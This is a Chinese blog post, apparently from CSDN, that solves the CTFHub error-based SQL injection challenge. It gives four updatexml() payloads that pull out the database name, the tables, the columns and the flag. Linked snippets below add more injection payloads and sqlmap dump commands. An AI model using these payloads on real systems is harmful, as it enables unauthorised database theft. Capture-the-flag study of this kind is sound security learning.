CTFHUB-WEB-SQL注入-报错注入

最新推荐文章于 2024-03-01 20:40:00 发布
最新推荐文章于 2024-03-01 20:40:00 发布
阅读量146 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49539962/article/details/132164589
版权

原题

 

解题思路

        报错注入是通过页面返回的报错信息查找目标数据,当然使用sqlmap也可以实现注入,但是sqlmap时间比较长。

        MySQL的 updatexml() 函数在第二个参数为特殊字符时报错,并将第二个参数的内容显示在报错信息中。

         查找数据库名为sqli,表有new和flag,flag中列flag。

-1 and (select updatexml(1, (concat (0x7e, (select database()))),1))


-1 and (select updatexml(1, (concat (0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='sqli'))),1)) 



-1 and (select updatexml(1, (concat (0x7e, (select group_concat(column_name) from information_schema.columns where table_name='flag'))),1)) 


-1 and (select updatexml(1, concat(0x7e, (select flag from flag)), 1))

 

 

 

mysmartwish
关注
[ctf web]sql报错注入
qq_37301470的博客
11-12 330
报错注入 一: exp,pow溢出报错 exp(int) 返回e的x次方 exp(~(select * from (select user())a)) ~:取反运算符 将字符串处理后变为大整数,报错 exp(710):报错 exp(709):不报错 绕过if,case的过滤进行基于报错的布尔盲注。 pow(int,int) 返回x的y次方 数值过大报错 pow(1+(sql表达式),99999999999999) 若sql语句为假则不报错 为真则报错 二:XML和Xpath基础 XML:标记
CTFHUB-web-SQL注入
ookami6497的博客
11-29 894
CTFHUB SQL
CTFHUB-SQL注入-报错注入
m0_64180167的博客
11-29 926
报错注入是在网站提供查询时进行SQL注入在用户输入了错误的信息时 网站进行报错处理但是提交的不进行审查 就会让代码随着报错指令进入目录。
sql注入报错注入-ctf
时光凉春衫薄的博客
08-11 251
数据库 ?id=1' union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a%23 获取表名 ?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='secur
CTFHUB——SQL 报错注入三种方法全解
wuuconix's blog
08-25 3429
背景 Sql注入主要有三种方法,extractvalue和updatexml函数形成的xpath报错,这算两种。还有一种就是floor实现的group by主键重复,这算另外一种。 本篇文章将对CTFHUB中的SQL报错注入题目从头到尾对这三种方法进行实践。 利用extractvalue来xpath报错。 1 and (select extractvalue(1, concat(0x7e, (select database())))) 1 and (select extractvalue(1, conc
CTFHub-报错注入-wp
z1moq的博客
05-09 293
报错注入 输入1,返回正常 输入 1’ ,出现报错提示 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 ​ 可知在有 ’ 字符型闭合符时会产生报错 使用 order by 查询字段数 结果在字段数为3时产生报错 使用select 1,2
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
最新发布
2301_80162151的博客
03-01 850
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1278
CTFHUB-WEB-SQL注入
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 479
个人CTF学习之路
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5612
Ctfhub解题 web SQL注入
SQL学习(CTFhub)整数型注入,字符型注入,报错注入 -----手工注入+ sqlmap注入
qq_73861475的博客
11-13 634
1 order by 1,接着尝试爆1 order by 2, 1 order by 3,结果到1 order by 3出现报错,由此可以判断,表格中有两个字段。id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump。id=1 -D (数据库名) -T (输入需要查询的表名) --columns。-1' union select 1,database() #(这里的-1和整数型注入的情况一样)那就输入1' ,发现报错没有回显,接着输入1' and 1=1。
CTFHUB|SQL注入sqlmap)
m0_60651303的博客
07-14 1280
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
Ctfhub - web -- SQL注入
m0_52920608的博客
01-28 3958
CTFHub sql注入 web mysql python脚本
报错注入常见函数原理
p_utao的博客
11-04 697
floor函数 select count(*),(floor(rand(0)*2))x from table group by x; select查询语句 group by进行分组(相同为一组) rand()生成0到1的随机数 floor()返回整数 count()对数据整合(类似去重) 产生原因:mysql在执行该语句会建立一个虚拟表,表中有两个字段(一个是分组的值和一个计数的值),当分组已经存在后就会爆错。 参考:http://www.cnblogs.com/sfriend/p/11365999.ht
CtfhubSQL注入|SQL报错注入及原理详解
tempulcc的博客
10-10 1542
手工测试sql注入及原理1、SQL 整数型注入查数据库名查数据表查flag表字段2、字符型注入3、报错注入updatexml() 函数致MYSQL显错注入原理updatexml() 函数定义updatexml() 函数运行机制updatexml() 函数运行示例不报错示例构造报错利用updatexml()测试ctfhub的显错注入 1、SQL 整数型注入 查数据库名 -1 union select group_concat(schema_name),2 from information_schema.sch
CTF 中的 SQL 注入总结
重新启程
10-12 4913
flag 常见表 1 select flag from flag SQL 注入的基本原理 1 2 3 select * from user where username='' and pass='' # 构造 username=devnull' or '1后,sql 语句变成 select * from us...
CTF-Web11(涉及SQL注入的绕过)
→_→
08-27 1273
11.加了料的报错注入 先查看网页源代码,收集信息: 分析: 页面提示我们POSTusername与password两个参数,看了看源码,里面提示了我们sql语句 $sql="select*fromusers whereusername='$username'andpassword='$password'"; 先随手p...
ctfsql注入——报错注入
wlllllianqing的博客
09-14 1071
报错注入 报错注入主要利用执行的报错返回的信息来进行注入从而获得需要的信息。 报错注入有许多的函数可以使用 例如: floor(rand()*2); updatexml函数:or updatexml(1,concat(0x7e,(version())),0); updatexml第二个参数需要的是Xpath格式的字符串。输入不符合,因此报错。 *updatexml的最大长度是32位。 and extractvalue(1,concat(0x7e,(select database()))) and exp(
CTF-SQL注入
weixin_44770698的博客
06-16 5338
CTF-SQL注入题目整理
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值